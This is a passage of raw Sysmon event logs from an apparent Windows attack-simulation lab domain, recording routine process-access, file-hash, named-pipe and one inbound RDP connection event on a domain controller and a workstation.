10341000x80000000000000001050861Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:05.381{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x80000000000000001050860Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:05.372{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5D1-60EB-727D-00000000CF01}7848C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050859Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:05.372{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5D1-60EB-727D-00000000CF01}7848C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050858Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:05.350{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5D1-60EB-727D-00000000CF01}7848C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050857Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:05.339{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F5D1-60EB-727D-00000000CF01}7848C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050856Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:05.335{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F5D1-60EB-727D-00000000CF01}7848C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050855Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:05.334{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5D1-60EB-727D-00000000CF01}7848C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050854Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:05.308{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D9B482AEC466EADFBDC4B6826679B9A,SHA256=630269C9DCFF06C7E1B3A084239E9E8697118354F536E8FBB10F1CF835FB6BDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808428Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:06.793{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DED74DA82B00986D777348DB4F33DF0,SHA256=8778DC4B57CE4787A8F6630958BE6F67E15D556764E25708A208E5AFD20CA33A,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001050873Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:06.338{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62771B4469C1461EABE296C3054AB300,SHA256=F725542EF9CE63DA2EA76806E19812EEC78BBD4D68E64C7D8F8F4C3EF30C1DAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050872Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:06.324{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC98C076A4441C4F115F3BC1BE1D4895,SHA256=8FEB40F1F592A70703746963290A5C80FDED0EEBD4DE82C03F9E2D050F7105D7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808427Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:05.193{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse89.248.165.74recyber.net46682-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000808426Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:06.340{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=99FB400CD1BC03EDDD44992DF72704C8,SHA256=872BB68EE2B8A2CB010F76C2A352848F926DE0A218D847A2B4613992C8B5BF71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808425Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:06.340{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F85CABCAAF543E34A538337C738CA17,SHA256=882549E8A4E1C7D60625BE8A5E0DF7CC817A0B643F5055BE7CAC22EAE534345C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050871Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:06.318{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050870Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:06.284{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla 
Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001050869Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:06.280{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f78f|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001050868Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:57:06.274{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.7548.373.49070802C:\Program Files\Mozilla Firefox\firefox.exe 
17141700x80000000000000001050867Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:57:06.274{466BC892-57B0-60E8-6810-00000000CF01}7548\chrome.7548.373.49070802C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000001050866Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:06.270{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+8a26e|C:\Windows\System32\ole32.dll+89b6b|C:\Windows\System32\ole32.dll+88d27|C:\Windows\System32\ole32.dll+8c957|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9 
10341000x80000000000000001050865Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:06.268{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+b5f62|C:\Windows\System32\ole32.dll+89b39|C:\Windows\System32\ole32.dll+88d27|C:\Windows\System32\ole32.dll+8c957|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9 23542300x8000000000000000808429Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:07.809{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49E029131E59200E7B634339853B1EC4,SHA256=4A8ACCE606DC1F5C08CEB2C2A41DB173081F69768248AB433ED16E040EAB8ECB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050874Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:07.330{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A3082950E05E1324F650BE3F8060F2B,SHA256=E4811720F9BBA5B9950AD2EEE7CC4C0809DAF79839A3621EC191B4906D6588F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808430Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:08.809{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEAFD7EB14B39A5447707A08FEF72F65,SHA256=A324C74973EAFF72A1B57E35BF9E31710A2DB04935FB02CBD73CB0A6917AB4DA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050884Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:08.861{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050883Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:08.861{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050882Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:08.388{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050881Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:08.388{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050880Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:08.388{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050879Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:08.388{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050878Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:08.388{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F5D4-60EB-737D-00000000CF01}7616C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050877Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:08.373{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F5D4-60EB-737D-00000000CF01}7616C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Notepad++\NppShell_06.dll+4449|C:\Program Files\Notepad++\NppShell_06.dll+46a6|C:\Windows\System32\SHELL32.dll+80337|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0|C:\Windows\System32\SHELL32.dll+16ad2e|C:\Windows\System32\SHELL32.dll+737a1|C:\Windows\System32\SHELL32.dll+76686|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53 154100x80000000000000001050876Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 